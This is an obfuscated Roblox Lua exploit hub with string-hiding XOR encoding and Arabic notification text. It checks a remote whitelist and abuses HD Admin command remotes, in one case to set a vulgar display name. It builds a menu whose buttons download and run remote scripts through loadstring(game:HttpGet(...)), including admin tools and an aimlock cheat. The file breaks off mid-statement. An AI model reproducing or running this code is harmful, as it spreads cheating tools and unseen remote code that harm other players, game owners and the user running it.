--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v25=1 + 0, #v9 do v6(v11,v0(v4(v1(v2(v9,v25,v25 + 1)),v1(v2(v10,1 + 0 + 0 + ((v25-1)% #v10),(1573 -(971 + 601)) + ((v25-(1316 -((1460 -(498 + 115)) + (2179 -(1553 + 158)))))% #v10) + 1)))%(828 -(552 + (87 -67)))));end return v5(v11);end game:GetService(v7("\236\68\179\246\151\218\66\149\241\138","\191\48\210\132\227")):SetCore(v7("\71\135\252\57\82\77\178\165\114\139\241\60\104\75\169\162","\20\226\146\93\28\34\198\204"),{[v7("\212\23\170\48\229","\128\126\222\92")]="تم تشغيل السكربت بنجاح",[v7("\7\81\95\22","\83\52\39\98\213\194")]="صلي علي النبي قبل البدا | ملاحظه انا متبري عن كامل ذنوبكم",[v7("\27\6\255\191","\82\101\144\209\83")]="rbxthumb://type=Asset&id=5107182114&w=150&h=150"});Duration=50;local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/Bekonader/bahahaha/main/Bahahah",true))();if v8[game.Players.LocalPlayer.Name] then wait(0.5);local v12={[1]=v7("\20\124\237\191\243\15\114\224\254\177\31\113\233\167\251\31\122","\47\31\133\222\129")};game:GetService(v7("\101\52\55\39\130\84\48\51\46\143\100\37\40\57\138\80\52","\55\81\71\75\235")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v12));wait(1 + 0);local v12={[1]=";name me اه اه كـسـ ي"};game:GetService(v7("\96\30\23\10\214\81\26\19\3\219\97\15\8\20\222\85\30","\50\123\103\102\191")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v12));else local v13=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();local v14=v13:MakeWindow({[v7("\255\181\11\192","\177\212\102\165\177")]=v7("\230\51\58\116\51\168\241\52\81\71\51\210\242","\164\118\113\59\19\224"),[v7("\205\193\220\5\213\218\221\13\236\221\213","\133\168\184\96")]=false,[v7("\30\65\29\185\196\252\50\87\29","\87\47\105\203\171\168")]=v7("\171\2\150\19\240\29\134\171\103\161\124\226\3","\233\71\221\92\208\85\211"),[v7("\26\114\108\188\39\121\140\47\122\125","\73\19\26\217\100\22\226")]=true,[v7("\160\125\138\58\138\117\162\51\143\118\129\46","\227\18\228\92")]=v7("\24\234\124\192\108\52\15\237\23\243\108\78\12","\90\175\55\143\76\124")});local v15=v14:MakeTab({[v7("\97\254\209\170","\47\159\188\207\99")]=v7("\36\11\83\52","\108\68\30\113"),[v7("\192\176\243\139","\137\211\156\229\125\165\154")]="rbxassetid://4483345998",[v7("\44\245\234\92\95\51\94\141\18\235\246","\124\135\143\49\54\70\51\194")]=false});local v16=v15:AddSection({[v7("\48\210\86\207","\126\179\59\170\194\173\51")]=v7("\168\99\132\157","\224\44\201\216\138\95")});v15:AddButton({[v7("\53\114\233\237","\123\19\132\136\49\79\232\140")]=v7("\155\84","\201\17\55\58\178"),[v7("\144\130\21\25\139\91\72\184","\211\227\121\117\233\58\43")]=function()wait(0.1);local v26={[(1439 -(421 + 1014)) -(5 -2)]=v7("\210\76\229","\233\62\128\231")};game:GetService(v7("\237\134\99\43\28\127\222\151\118\35\38\104\208\145\114\32\16","\191\227\19\71\117\28")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v26));end});v15:AddButton({[v7("\31\138\162\10","\81\235\207\111")]=v7("\239\88","\189\110\168\212\68\59\29\162"),[v7("\254\139\168\135\190\162\38\214","\189\234\196\235\220\195\69")]=function()wait(0.1 + 0);local v27={[3 -2]=v7("\96\204\48\159\97\51\129\50\136\49\31\206\49\140\125\63\245\45\152\124\43\129","\91\161\95\237\17")};game:GetService(v7("\186\77\154\250\215\222\137\92\143\242\237\201\135\90\139\241\219","\232\40\234\150\190\189")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));wait(1854.1 -(1399 + 455));local v27={[1]=v7("\93\16\74\165\20","\102\115\34\196")};game:GetService(v7("\111\207\156\86\11\58\195\212\88\206\191\78\13\43\195\199\88","\61\170\236\58\98\89\162\160")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));wait(0.1);local v27={[(2 + 1) -(1 + 1)]=v7("\237\223\115\221\180\14\146\167\179\146\114\192\171\4\131\234","\214\178\28\175\196\102\178\202")};game:GetService(v7("\5\211\37\188\82\169\223\24\50\210\6\164\84\184\223\11\50","\87\182\85\208\59\202\190\108")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));wait((484.1 -(159 + 325)) -0);local v27={[1]=v7("\75\251\209\191\125\10\29","\112\142\191\220\21\107\111\73")};game:GetService(v7("\64\123\238\241\123\125\255\233\119\122\205\233\125\108\255\250\119","\18\30\158\157")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v27));end});local v17=v14:MakeTab({[v7("\148\238\62\14","\218\143\83\107\132\56\140\69")]=v7("\44\28\11\196\197","\109\88\70\141\139\97\217\223"),[v7("\53\85\225\78","\124\54\142\32\176\188\234\192")]="rbxassetid://4483345998",[v7("\42\68\4\234\220\217\32\53\88\13\254","\122\54\97\135\181\172\77")]=false});local v16=v17:AddSection({[v7("\193\137\88\27","\143\232\53\126\98\201\109")]=v7("\196\230\116\146\122","\133\162\57\219\52\210\61")});v17:AddButton({[v7("\28\75\167\126","\82\42\202\27\60")]=v7("\114\107\117\198\0\158\51\101","\51\47\56\143\78\190\122"),[v7("\192\203\244\91\225\203\251\92","\131\170\152\55")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hexx/main/Iv%20Admin/Admin%202.lua"))();end});v17:AddButton({[v7("\232\160\140\244","\166\193\225\145")]=v7("\243\251\80\247\34\137\251\241\91\247\34\224\230\250\68\247\41\229\246","\178\191\29\190\108\169"),[v7("\36\17\138\174\60\210\58\12","\103\112\230\194\94\179\89")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))();end});local v18=v14:MakeTab({[v7("\1\138\222\18","\79\235\179\119\160")]=v7("\7\11\222\48\222\230\7\104\202\60","\84\72\140\121\142\178"),[v7("\141\240\59\218","\196\147\84\180")]="rbxassetid://4483345998",[v7("\44\45\79\171\21\42\71\137\18\51\83","\124\95\42\198")]=false});local v16=v18:AddSection({[v7("\117\226\76\142","\59\131\33\235\133\142\129\33")]=v7("\159\221\191\31\61\152\205\205\16\40","\204\158\237\86\109")});local v19=v14:MakeTab({[v7("\136\180\83\77","\198\213\62\40")]=v7("\198\34\3\135\197\53\2","\149\97\81\206"),[v7("\163\116\26\162","\234\23\117\204\71\161\27")]="rbxassetid://4483345998",[v7("\229\188\7\113\45\192\163\45\114\40\204","\181\206\98\28\68")]=false});local v16=v19:AddSection({[v7("\31\208\224\174","\81\177\141\203\55\30\175")]=v7("\5\127\119\204\222\133\102","\86\60\37\133\142\209\53")});v18:AddButton({[v7("\53\232\206\80","\123\137\163\53\157\31\224\120")]=v7("\213\108\50\194\211\126\39","\144\42\116\135"),[v7("\195\76\2\29\5\9\195\128","\128\45\110\113\103\104\160\235")]=function()wait((1939 -1406) -((591 -340) + 112 + 169));local v28={[323 -(101 + 221)]=v7("\47\72\122\105\100\77\53\118\113\5\113","\20\37\21\27")};game:GetService(v7("\198\169\188\7\253\175\173\31\241\168\159\31\251\190\173\12\241","\148\204\204\107")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1 + 0]=v7("\109\87\173\111\90\62\26\175\120\10\56\85\173\127\27","\86\58\194\29\42")};game:GetService(v7("\31\65\41\233\89\133\114\14\40\64\10\241\95\148\114\29\40","\77\36\89\133\48\230\19\122")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(3 -(2 + 0));local v28={[4 -3]=v7("\140\116\16\74\31","\183\23\120\43\109\32\98\226")};game:GetService(v7("\194\142\79\241\124\238\241\159\90\249\70\249\255\153\94\250\112","\144\235\63\157\21\141")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(743 -(119 + 623));local v28={[1 + 0]=v7("\134\40\51\226\50\211\188\157\113\103\166\33\134\232\141\117\99","\189\64\82\150\18\190\217")};game:GetService(v7("\236\42\84\69\14\221\46\80\76\3\237\59\75\91\6\217\42","\190\79\36\41\103")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(2 -(3 -2));local v28={[1]=v7("\145\178\117\158\182\199\191\52\219\174\157\227\45\210\166\159\236","\170\218\20\234\150")};game:GetService(v7("\213\172\60\160\243\34\230\189\41\168\201\53\232\187\45\171\255","\135\201\76\204\154\65")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[(438 + 1133) -(572 + (2507 -1509))]=v7("\108\68\230\18\159\58\73\167\87\136\99\24\183\80\143\101\21\181","\87\44\135\102\191")};game:GetService(v7("\54\22\217\74\13\16\200\82\1\23\250\82\11\1\200\65\1","\100\115\169\38")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\119\18\30\210\200\173\172\89\126\75\74\145\217\248\252\72\121","\76\122\127\166\232\192\201\121")};game:GetService(v7("\53\95\193\14\14\89\208\22\2\94\226\22\8\72\208\5\2","\103\58\177\98")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1510 -(909 + 396 + 204)]=v7("\10\22\173\107\16\92\27\236\46\9\3\75\249\40\9\0\77","\49\126\204\31\48")};game:GetService(v7("\4\81\104\69\63\87\121\93\51\80\75\93\57\70\121\78\51","\86\52\24\41")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(845 -(327 + (1533 -(823 + 193))));local v28={[1 -0]=v7("\221\241\130\212\198\244\134\128\215\161\208\148\208\161\218\150\213","\230\153\227\160")};game:GetService(v7("\124\86\203\238\71\80\218\246\75\87\232\246\65\65\218\229\75","\46\51\187\130")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((2691 -1853) -(172 + 665));local v28={[267 -(201 + 65)]=v7("\221\177\116\245\85\12\112\165\215\237\36\182\65\83\33\180\222","\230\217\21\129\117\97\21\133")};game:GetService(v7("\142\197\145\122\181\195\128\98\185\196\178\98\179\210\128\113\185","\220\160\225\22")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 -0);local v28={[1542 -(705 + 836)]=v7("\31\188\70\38\52\73\177\7\99\39\22\236\23\107\32\23\229","\36\212\39\82\20")};game:GetService(v7("\243\63\245\13\247\194\59\241\4\250\242\46\234\19\255\198\63","\161\90\133\97\158")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[(1676 -(1454 + 221)) -0]=v7("\79\28\187\201\108\213\229\84\69\238\138\120\142\181\67","\116\116\218\189\76\184\128")};game:GetService(v7("\237\39\63\119\56\28\222\54\42\127\2\11\208\48\46\124\52","\191\66\79\27\81\127")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((35 -(32 + 2)) + 0 + 0);local v28={[3 -2]=v7("\34\142\4\7\70\60\0\96\43\213\86\68\86\100\86\117\45","\25\230\101\115\102\81\101\64")};game:GetService(v7("\138\213\19\236\194\187\209\23\229\207\139\196\12\242\202\191\213","\216\176\99\128\171")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[2 -1]=v7("\140\80\134\71\151\85\130\19\143\1\214\4\134\8\208\2","\183\56\231\51")};game:GetService(v7("\19\223\246\193\203\122\32\206\227\201\241\109\46\200\231\202\199","\65\186\134\173\162\25")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 -0);local v28={[1]=v7("\90\26\218\156\11\12\23\155\217\28\82\68\137\220\29\84\67","\97\114\187\232\43")};game:GetService(v7("\158\49\247\233\165\55\230\241\169\48\212\241\163\38\230\226\169","\204\84\135\133")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((1479 -(1097 + 380)) -(4 -3));local v28={[1]=v7("\6\42\124\24\29\47\120\76\12\117\46\90\15\118\42\88\4","\61\66\29\108")};game:GetService(v7("\13\134\247\161\9\198\62\151\226\169\51\209\48\145\230\170\5","\95\227\135\205\96\165")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[(4 -2) -(1 -0)]=v7("\90\0\63\26\88\12\13\126\95\79\82\94\108\90\78\81\90","\97\104\94\110\120")};game:GetService(v7("\77\3\42\250\225\83\1\107\3\62\197\252\95\18\126\1\63","\31\102\90\150\136\48\96")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[713 -(523 + 189)]=v7("\136\16\223\233\147\21\219\189\130\79\141\171\129\76\136\164\132","\179\120\190\157")};game:GetService(v7("\110\95\147\46\173\223\198\72\95\135\17\176\211\213\93\93\134","\60\58\227\66\196\188\167")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 + 0);local v28={[1]=v7("\125\180\223\176\120\176\139\161\34\230\157\162\33\224\157\161","\21\213\171\144")};game:GetService(v7("\251\175\253\32\192\169\236\56\204\174\222\56\198\184\236\43\204","\169\202\141\76")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((3707 -2243) -(163 + 1300));local v28={[(1410 -(1017 + 390)) -(6 -4)]=v7("\72\240\234\171\69\93\22\184\186\237\93\2\66\175\179\231\80","\115\152\139\223\101\48")};game:GetService(v7("\127\133\149\121\14\116\19\178\72\132\182\97\8\101\19\161\72","\45\224\229\21\103\23\114\198")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[988 -(191 + 796)]=v7("\235\186\21\40\159\91\181\242\70\110\137\7\232\235\76\107\142","\208\210\116\92\191\54")};game:GetService(v7("\79\189\93\255\14\126\185\89\246\3\78\172\66\225\6\122\189","\29\216\45\147\103")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1 + 0]=v7("\76\161\223\21\67\26\172\158\82\82\70\253\139\81\82\68\248","\119\201\190\97\99")};game:GetService(v7("\14\165\79\232\33\178\61\180\90\224\27\165\51\178\94\227\45","\92\192\63\132\72\209")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1 -0);local v28={[2 -1]=v7("\161\66\83\19\104\179\255\10\3\81\113\234\174\30\7\86\125","\154\42\50\103\72\222")};game:GetService(v7("\100\120\226\82\49\76\231\226\83\121\193\74\55\93\231\241\83","\54\29\146\62\88\47\134\150")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[587 -(548 + 38)]=v7("\127\242\138\5\229\115\214\20\118\174\218\64\247\40\133\3","\68\154\235\113\197\30\179\52")};game:GetService(v7("\210\64\73\67\193\17\225\81\92\75\251\6\239\87\88\72\205","\128\37\57\47\168\114")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1]=v7("\81\83\114\195\23\73\15\27\32\132\7\19\90\13\42\129","\106\59\19\183\55\36")};game:GetService(v7("\185\61\255\194\130\59\238\218\142\60\220\218\132\42\238\201\142","\235\88\143\174")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1 + 0]=v7("\151\14\198\231\95\187\201\70\149\165\77\224\154\95\144\166\73","\172\102\167\147\127\214")};game:GetService(v7("\197\63\109\91\193\196\22\250\242\62\78\67\199\213\22\233\242","\151\90\29\55\168\167\119\142")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[1388 -(559 + 828)]=v7("\35\32\201\227\49\171\92\56\122\155\164\35\243\10\43\121\153","\24\72\168\151\17\198\57")};game:GetService(v7("\11\135\12\180\48\129\29\172\60\134\47\172\54\144\29\191\60","\89\226\124\216")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait((1 + 2) -(5 -3));local v28={[1]=v7("\163\179\166\59\11\91","\152\212\202\90\120\40\87\180")};game:GetService(v7("\214\242\6\247\129\77\115\240\242\18\200\156\65\96\229\240\19","\132\151\118\155\232\46\18")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));wait(1);local v28={[(551 + 619) -(997 + 172)]=v7("\176\206\177\194\162\21\225\112\238\141\177\220\172\9\166\120","\139\173\222\174\205\103\193\29")};game:GetService(v7("\149\232\46\39\59\164\236\42\46\54\148\249\49\57\51\160\232","\199\141\94\75\82")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v28));game:GetService(v7("\30\236\211\89\38\28\63\223\199\66","\77\152\178\43\82\121")):SetCore(v7("\243\38\95\34\238\44\69\47\198\42\82\39\212\42\94\40","\160\67\49\70"),{[v7("\107\51\85\69\76","\63\90\33\41\41\45\112")]="اكتملت الhats بنجاح",[v7("\39\41\61\74","\115\76\69\62\147\186\195")]="مبروك صرت مزعج مره",[v7("\219\88\170\205","\146\59\197\163\102\51\71")]="rbxthumb://type=Asset&id=5107182114&w=150&h=150"});Duration=32;end});v19:AddButton({[v7("\153\124\24\66","\215\29\117\39\188\94\146")]=v7("\230\245\100\102\215\147\48\224","\167\187\48\47\149\210\126"),[v7("\53\141\252\19\113\32\21\135","\118\236\144\127\19\65")]=function()local v29=Instance.new(v7("\107\35\209\249\93\46\228\233\81","\56\64\163\156"));local v30=Instance.new(v7("\119\7\112\31\83","\49\117\17\114\54\190"));local v31=Instance.new(v7("\2\215\207\219\253\65\52\215\219","\86\178\183\175\177\32"));local v32=Instance.new(v7("\254\250\80\73\132\15\58\254\197\241","\170\159\40\61\198\122\78\138"));local v33=Instance.new(v7("\134\132\186\150\165\19\162\88\189\143","\210\225\194\226\231\102\214\44"));local v34=Instance.new(v7("\189\208\83\241\5\37\206\20\134\219","\233\181\43\133\71\80\186\96"));antibang=function()while _G.antibang==true do game.Players:Chat(v7("\58\118\179\36\14\21\230\122\112","\20\23\221\80\103\119\135"));wait(1424 -(1259 + 164));end end;v29.Parent=game.Players.LocalPlayer:WaitForChild(v7("\220\210\41\72\12\254\249\61\88","\140\190\72\49\105"));v29.ResetOnSpawn=false;v30.Parent=v29;v30.BackgroundColor3=Color3.fromRGB(119 -36,202 -119,83);v30.Position=UDim2.new(473.0661887601 -(242 + 231),0,0.293827176 -0,0);v30.Size=UDim2.new(0,34 + 66,888 -((715 -148) + 278 + 43),75 + 25);v30.Active=true;v30.Draggable=true;v31.Parent=v30;v31.BackgroundColor3=Color3.fromRGB(180 + 75,28 + 25 + 32,0);v31.Position=UDim2.new( -(770.00410109013 -(463 + 307)),0 + 0, -0.00617286563,838 -(162 + 676));v31.Size=UDim2.new(695 -(167 + (2357 -1829)),365 -265,0,19);v31.Font=Enum.Font.SourceSans;v31.Text=v7("\2\53\37\229\113\239\13\60","\99\91\81\140\19\142");v31.TextColor3=Color3.fromRGB(0,0,0);v31.TextScaled=true;v31.TextSize=14;v31.TextWrapped=true;v32.Parent=v30;v32.BackgroundColor3=Color3.fromRGB(85,85,0 -(0 + 0));v32.Position=UDim2.new(646 -(164 + 482),0 -0,(0.269999981 + 0) -(0 -0),0 -0);v32.Size=UDim2.new((6590 -4860) -((2986 -(572 + 1086)) + (1957 -(1227 + 328))),100,0,20);v32.Font=Enum.Font.SourceSans;v32.Text=v7("\74\8\238\52\66\68\232\57\9\9\226\119\79\13\245\36\93","\41\100\135\87");v32.TextColor3=Color3.fromRGB((92 -(81 + 11)) -0,(463 -(157 + 306)) + (0 -0),0);v32.TextScaled=true;v32.TextSize=14;v32.TextWrapped=true;v32.MouseButton1Down:connect(function()loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hexx/main/Iv%20Admin/Admin%202.lua"))();end);v33.Parent=v30;v33.BackgroundColor3=Color3.fromRGB(85,184 -99,0 + 0);v33.Position=UDim2.new((397 -(289 + 108)) -(948 -(653 + 295)),0,316.539999962 -(108 + 208),(1083 -(463 + 620)) + (1072 -(931 + 141)));v33.Size=UDim2.new(0,100,0 -0,1710 -(460 + (3137 -(1360 + 547))));v33.Font=Enum.Font.SourceSans;v33.Text=v7("\83\5\229\219\203\83\5\246","\50\107\145\178\169");v33.TextColor3=Color3.fromRGB(0,0 + 0 + 0,0);v33.TextScaled=true;v33.TextSize=6 + 8;v33.TextWrapped=true;v33.MouseButton1Down:connect(function()_G.antibang=true;antibang();end);v34.Parent=v30;v34.BackgroundColor3=Color3.fromRGB(85,85,0);v34.Position=UDim2.new(0,0,0.800000012 + 0,0);v34.Size=UDim2.new(0,1891 -(633 + 1158),(0 + 0) -(0 + 0),73 -(481 -(293 + 135)));v34.Font=Enum.Font.SourceSans;v34.Text=v7("\21\232\15\12\225\7\242\20\21\163\7\242\7","\102\156\96\124\193");v34.TextColor3=Color3.fromRGB(0,0,0);v34.TextScaled=true;v34.TextSize=13 + 1;v34.TextWrapped=true;v34.MouseButton1Down:connect(function()_G.antibang=false;end);end});local v20=v14:MakeTab({[v7("\44\230\227\255","\98\135\142\154\138\67")]=v7("\203\5\53\14","\140\80\124\93\237\180"),[v7("\233\202\245\34","\160\169\154\76\49\89\122")]="rbxassetid://4483345998",[v7("\186\8\253\184\131\15\245\154\132\22\225","\234\122\152\213")]=false});local v16=v20:AddSection({[v7("\236\81\198\6","\162\48\171\99\84\166")]=v7("\54\255\81\6","\113\170\24\85\28\178")});v20:AddButton({[v7("\216\8\69\85","\150\105\40\48\120\16\103\39")]=v7("\110\240\172\77\196\149\88\169\186","\61\137\194\44\180\230"),[v7("\5\252\80\120\61\133\37\246","\70\157\60\20\95\228")]=function()loadstring(game:HttpGet("https://pastebin.com/raw/tWGxhNq0"))();end});v20:AddButton({[v7("\246\12\51\46","\184\109\94\75\56\180")]=v7("\195\105\67\134\44\167\96\69\151","\135\40\16\213\109"),[v7("\221\40\190\163\199\190\253\34","\158\73\210\207\165\223")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Makramdaca/dacca/main/.github/workflows/blank.yml"))();end});v19:AddButton({[v7("\153\2\22\187","\215\99\123\222\58")]=v7("\118\129\239\165\5\145\11\97\121","\55\207\166\232\68\197\66\46"),[v7("\5\87\167\233\240\213\37\93","\70\54\203\133\146\180")]=function()Animation=function(v95)v95:WaitForChild(v7("\151\19\138\25\89\108\239","\214\125\227\116\56\24\138"));game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored=true;for v97,v98 in ipairs(game.Players:GetChildren()) do local v99=game.Players.LocalPlayer.Character.Animate;v99.idle.Animation1.AnimationId="http://www.roblox.com/asset/?id=782841498";v99.idle.Animation2.AnimationId="http://www.roblox.com/asset/?id=782841498";v99.walk.WalkAnim.AnimationId="http://www.roblox.com/asset/?id=616168032";v99.run.RunAnim.AnimationId="http://www.roblox.com/asset/?id=616163682";v99.jump.JumpAnim.AnimationId="http://www.roblox.com/asset/?id=1083218792";v99.climb.ClimbAnim.AnimationId="http://www.roblox.com/asset/?id=1083439238";v99.fall.FallAnim.AnimationId="http://www.roblox.com/asset/?id=707829716";v99.swim.Swim.AnimationId="http://www.roblox.com/asset/?id=616165109";v99.swimidle.SwimIdle.AnimationId="http://www.roblox.com/asset/?id=616166655";game.Players.LocalPlayer.Character.Humanoid.Jump=false;end wait(1);game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored=false;end;Animation(game.Players.LocalPlayer.Character);game.Players.LocalPlayer.CharacterAdded:Connect(Animation);end});local v21=v14:MakeTab({[v7("\47\137\84\112","\97\232\57\21\71\189")]=v7("\200\225\101","\155\164\61\171\205\166"),[v7("\57\33\115\208","\112\66\28\190\88\157\184")]="rbxassetid://4483345998",[v7("\227\97\40\73\218\102\32\107\221\127\52","\179\19\77\36")]=false});local v16=v21:AddSection({[v7("\28\56\222\69","\82\89\179\32")]=v7("\201\43\110","\154\110\54\41\114")});v15:AddButton({[v7("\124\167\184\45","\50\198\213\72\73\178\102\177")]=v7("\102\120\210\234\103\234\127\121","\45\61\139\168\40\171"),[v7("\17\164\81\167\213\51\166\86","\82\197\61\203\183")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt",true))();end});local v22=v14:MakeTab({[v7("\145\19\170\63","\223\114\199\90\100\49")]=v7("\124\211\191\151\22\205\201","\56\146\159\223\89\130\141"),[v7("\156\209\93\176","\213\178\50\222")]="rbxassetid://4483345998",[v7("\48\222\41\81\254\203\70\253\14\192\53","\96\172\76\60\151\190\43\178")]=false});local v16=v22:AddSection({[v7("\173\192\40\1","\227\161\69\100\151\87\236\217")]=v7("\222\45\63\7\46\213\40","\154\108\31\79\97")});v22:AddButton({[v7("\116\217\4\94","\58\184\105\59")]=v7("\117\109\68\15\223\95\125\106\95\21\197\51\121\109\70","\60\35\18\70\140\127"),[v7("\255\125\14\143\216\14\38\215","\188\28\98\227\186\111\69")]=function()local v84=loadstring(game:HttpGet("https://raw.githubusercontent.com/Kinlei/Dynissimo/main/Scripts/AkaliNotif.lua"))();local v85=v84.Notify;v85({[v7("\105\210\183\200\215\24\212\188\68\216\170","\45\183\196\171\165\113\164\200")]=v7("\131\60\52\80\191\131\48\46\92\236\139\59\47\91\163\158","\234\82\66\57\204"),[v7("\200\40\58\246\209","\156\65\78\154\180\139\129\138")]=v7("\1\240\173\205\185\249\21\177\141\237\216\223\63\216\141\237\186\170\90\166\252","\108\145\201\168\153\155"),[v7("\240\57\78\40\165\226\224\218","\180\76\60\73\209\139\143")]=16 -6});loadstring(game:HttpGet("https://raw.githubusercontent.com/RFS-cmd/-/main/first"))();Aiming.TargetPart={v7("\85\61\24\133","\29\88\121\225\97\59")};Aiming.FOV=80 + (342 -232);Aiming.FOVSides=149 + 101;Aiming.HitChance=100;Aiming.ShowFOV=flace;getgenv().AutoPrediction=true;getgenv().Prediction=0.157 -0;if (getgenv().AutoPrediction==true) then h=function()while true do wait();local v110=game:GetService(v7("\125\23\125\46\214","\46\99\28\90\165\226\134")).Network.ServerStatsItem[v7("\252\184\1\203\123\26\33\214\190","\184\217\117\170\91\74\72")]:GetValueString();local v111=string.split(v110,"(");local v112=tonumber(v111[2 -(1 + 0)]);if ((v112>200) and (v112<((1442 -1102) -(13 + 27)))) then getgenv().Predictio=0.18742 -0;elseif ((v112>((431 -208) -(1186 -(63 + 1080)))) and (v112<195)) then getgenv().Predictio=0.16779123;elseif ((v112>(71 + 69)) and (v112<180)) then getgenv().Predictio=946.16 -(884 + 62);elseif ((v112>(268 -158)) and (v112<(1601 -(106 + 30 + (1837 -(67 + 445)))))) then getgenv().Predictio=0.15934;elseif (v112<105) then getgenv().Predictio=0.138;elseif (v112<(676 -(566 + 20))) then getgenv().Predictio=0.136;elseif (v112<(222 -142)) then getgenv().Predictio=0.134 + 0;elseif (v112<(1120 -(131 + 919))) then getgenv().Predictio=0.131;elseif (v112<(29 + 11 + 1 + 19)) then getgenv().Predictio=0.1229 + 0;elseif (v112<(106 -56)) then getgenv().Predictio=1976.1225 -(690 + 1286);elseif (v112<(913 -(582 + 291))) then getgenv().Predictio=551.1256 -(319 + 232);end getgenv().Prediction=getgenv().Predictio;end end;spawn(h);end end});local v23=v14:MakeTab({[v7("\22\51\125\227","\88\82\16\134\189\111\158")]=v7("\26\130\126\11\84\110\9\126\142\17\7\94\101\9","\94\195\94\67\27\33\77"),[v7("\211\14\196\76","\154\109\171\34\172\39\20")]="rbxassetid://4483345998",[v7("\202\76\29\20\243\75\21\54\244\82\1","\154\62\120\121")]=false});local v16=v23:AddSection({[v7("\29\31\167\54","\83\126\202\83\150\236\101\169")]=v7("\117\197\82\30\156\204\36\17\201\61\18\150\199\36","\49\132\114\86\211\131\96")});v23:AddButton({[v7("\126\189\41\36","\48\220\68\65")]=v7("\110\157\219\231\99\155\213\140\15\144\215\231\103\155\217\131\15\153\217\131\106\144\210","\47\212\150\199"),[v7("\89\132\38\134\181\75\132\114","\26\229\74\234\215\42\231\25")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/FDHKZY/Hood-Moddedaimlock/main/GU%C4%B0",true))();end});v22:AddButton({[v7("\30\56\195\57","\80\89\174\92\208\52")]=v7("\249\177\196\159\70\31\192\192\243","\183\228\143\218\20\63\141\143"),[v7("\137\119\182\221\168\119\185\218","\202\22\218\177")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Allvideo/test/main/Whitelist.txt"))();end});v21:AddParagraph(v7("\53\229\0\119\161\210\1\26\37\229\2\124","\86\138\109\18\200\188\102\58"),v7("\197\223\82\33\217\216\6\107\207\196\31\46\197\197\21\107\223\196\29\37\141","\172\171\114\75"));local 